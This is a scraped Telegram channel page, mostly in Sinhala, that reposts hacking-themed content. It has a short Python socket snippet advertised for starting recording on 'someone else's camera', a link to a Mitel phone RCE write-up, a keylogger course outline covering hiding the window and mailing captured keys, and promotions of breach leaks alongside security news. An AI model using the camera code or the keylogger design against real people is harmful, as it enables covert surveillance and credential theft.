ℭ𝔲𝔯𝔰𝔢𝔡 ℭ𝔬𝔡𝔢 ⁶⁶⁶ 🇱🇰
Открыть в Telegram
"Beyond the Firewall🔥. Beneath the Surface." 🇱🇰 Big Brain 🧠 Community Ahead >> ~ සිරි ලන්කන් Alice 👾 ⭕️Main chanel ㅤ @cursed_code ⭕️Discussion ㅤ @cursed_code_chat ⭕️Cloud ㅤ @backup_yo ⭕️Official Books @behind_the_scene_book
БольшеНет данных
Подписчики
+324 часа
+437 дней
+22230 день
Архив постов
Repost from විශ්ම ලෝකය ♻️𝗪𝗶𝘀𝗵𝗺𝗮𝗹🌏𝗸𝗮𝘆𝗮⦁
✅ දැනුම සොයන පිපාසිතයන් වෙනුවෙන්ම වෙන් වූ නවාතැන.❤️🍀
🔻අධ්‍යාපනික තොරතුරු 📚❤️
🔺අරුම පුදුම දේවල් ☀️😦
🔻අභිරහස් ගවේෂණ ❓👻
🔺අලුත් වන තාක්ෂණය 💻🔻
🔻ලෝකයේ අලුත්ම විස්තර ⏰😔
🔺තවත් බොහෝ දෑ සමග 💕🥰
🍀 එකී නොකී මෙකී දෑ සමග ලෝකයේ විශ්ව ගවේෂනයට ඔබත් දැන්ම එකතු වෙන්න. ❤️
🔤🔤🔤🔤 🔤🔤🔤
💎Here’s the python code to start recording with someone else’s camera
import socket
camera = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
camera.connect(('192.168.42.1', 6666))
# Start recording command
command = [0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x04, 0x00, 0x02, 0x00, 0x02, 0x01, 0x00, 0x00, 0x80, 0x00, 0x00, 0x08, 0x01]
camera.sendall(bytes(command))
Source :- nextgen forumදැන් ටික දවසකට කලින්,Conti ransomware group හි සහ Lockbit ransomeware group සම්බන්දව වැඩ කරන අවුරුදු 28 ක් වන පුද්ගලයෙක් ukraine national police විසින් අත්තඩංගුවට ගෙන තිබෙනවා.
#ukrain #lockbit #news
Exploiting embedded mitel phones for unauthenticated remote code execution
Achieving a fully unauthenticated RCE exploit as root in a Mitel IP phone. Several 0-days were discovered which chained together gives the privilege of completely owning the phone
https://baldur.dk/blog/embedded-mitel-exploitation.html
කෝමද ඒක ??
#remote #remoteacess
Course : Build an Advanced C++ Keylogger [Udemy]
Content :
├── 1. Introduction
├── 2. Setting up the development environment
├── 3. How to hide the keylogger window and prevent it from popping
├── 4. Mapping physical keys to human friendly names
├── 5. Creating auxiliary gernal purpose functions
├── 6. Writing the code for custom encryption
├── 7. Handling Input Ouput I-O
├── 8. Dealing with time intervals (Timer header)
├── 9. Implementing the Send Mail option
├── 10. Setting up Hooks to capture pressed keys on the keyboard and mouse as well
├── 11. Let us see how it works
└── 12. Decryption
#c++ #keyloger- Technology දැන ගෙන Cyber ලෝකයේ HERO කෙනෙක් වෙන්න-
• Hacking tips
• Breached & Leaks ⚰
• Hacking open source projects
• Courses
• E-books
• tech tips
• Hacking tutorials
ගැන සියලුම දේ එකම තැනකින් සැනින් ලබා ගන්න එකතුවන්න ɮʟօɢs ɮʏ ƙȝՌՎԹ සමග. ❤️
- Giveaway [ 500 Hacking tools ]
Blog By Kenya
Repost from BleepingComputer
Ascension hacked after employee downloaded malicious file
Ascension, one of the largest U.S. healthcare systems, revealed that a May 2024 ransomware attack was caused by an employee who downloaded a malicious file onto a company device. [...]
https://www.bleepingcomputer.com/news/security/ascension-hacked-after-employee-downloaded-malicious-file/
චීන කණ්ඩායමක් ලොව පළමුවරට කිලෝමීටර් 8,000ක දුරක සිට නැත්කමක් සිදු කරයි💸
චීනයේ ශල්‍ය වෛද්‍ය කණ්ඩායමක් ලොව පළමුවරට telesurgery තාක්ෂණය හරහා සාර්ථක ලෙස සැත්කමක් සිදු කිරීමට සමත්ව තිබේ. ඒ අනුව මෙහිදී එම කණ්ඩායම බීජිං නුවර වෙසෙන පුරස්ති ග්‍රන්ථියේ පිළිකාවක් සහිත පුද්ගලයෙකු වෙත ඉතාලියේ රෝම නුවර සිට මෙම තාක්ෂණය හරහා අදාළ සැත්කම් සිදු කර තිබේ. මෙම ස්ථාන දෙක අතර දුර කිලෝමීටර් 8,000කට අධික බව සඳහන් වෙයි. මෙහිදී ශල්‍ය වෛද්‍ය කොන්සෝලයක් මගින් පාලනය කෙරෙන රොබෝ අත් යොදා ගනිමින් සැත්කම සිදු කර තිබේ. බීජිං රෝහලේ සිටි තවත් වෛද්‍ය කණ්ඩා යමක් මෙම සැත්කම් නිරික්ෂණය කර ඇත.💊
